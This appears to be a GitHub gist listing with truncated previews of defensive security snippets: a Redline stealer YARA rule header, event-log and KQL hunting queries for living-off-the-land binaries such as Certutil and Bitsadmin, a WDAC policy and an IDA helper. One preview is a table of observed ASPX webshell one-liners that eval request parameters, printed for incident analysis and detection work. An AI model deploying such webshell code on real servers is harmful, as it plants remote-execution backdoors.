This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule redline_new_bin | |
{ | |
meta: | |
description = "Redline stealer" | |
author = "James_inthe_box" | |
reference = "https://app.any.run/tasks/4921d1fe-1a14-4bf2-9d27-c443353362a8" | |
date = "2021/06" | |
maltype = "Stealer" | |
strings: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -OutputAssembly hello.exe -TypeDefinition @' | |
using System; | |
public class Hello { | |
public static void Main(string[] Args) { | |
System.Console.WriteLine("Hello, world!"); | |
System.Console.Read(); | |
} | |
} | |
'@ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Log the time prior to executing the action. | |
# This will be used as parth of an event log XPath filter. | |
$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc) | |
# Do the thing now that you want to see potential relevant events surface... | |
$null = Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly | |
# Allow a moment to allow events to populate | |
Start-Sleep -Seconds 5 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Inspiration from https://github.com/jangeisbauer/AdvancedHunting/blob/master/hunt_for_lolbins just changed Processes to Networkevents | |
// T1218 Living of the land binaries connecting to the internet | |
// network activities with lolbins | |
DeviceNetworkEvents | |
| where RemoteIPType == 'Public' | |
| where InitiatingProcessFileName contains "Atbroker.exe" or | |
InitiatingProcessFileName contains "Bash.exe" or | |
InitiatingProcessFileName contains "Bitsadmin.exe" or | |
InitiatingProcessFileName contains "Certutil.exe" or | |
InitiatingProcessFileName contains "Cmdkey.exe" or |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<QueryList> | |
<Query Id="0" Path="Security"> | |
<Select Path="Security"> | |
*[System[(EventID='4688')]] | |
and | |
*[EventData[Data[@Name='NewProcessName']='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe']] | |
</Select> | |
<Select Path="Microsoft-Windows-PowerShell/Operational"> | |
*[System[(EventID='4104')]] | |
and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Occurrences | Webshell Filename | WebShell Syntax | |
---|---|---|---|
46 | C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
35 | C:\inetpub\wwwroot\aspnet_client\discover.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
21 | C:\inetpub\wwwroot\aspnet_client\shell.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script> | |
13 | C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
8 | C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script> | |
7 | C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx | http://f/<script language= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy"> | |
<VersionEx>10.0.0.0</VersionEx> | |
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
<Rules> | |
<Rule> | |
<Option>Enabled:Unsigned System Integrity Policy</Option> | |
</Rule> | |
<Rule> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DEBUG = True | |
def get_basic_block(ea): | |
"""get basic blocks of address""" | |
f = idaapi.get_func(ea) | |
fc = idaapi.FlowChart(f) | |
for block in fc: | |
if block.start_ea <= ea: | |
if block.end_ea > ea: | |
return block.start_ea, block.end_ea |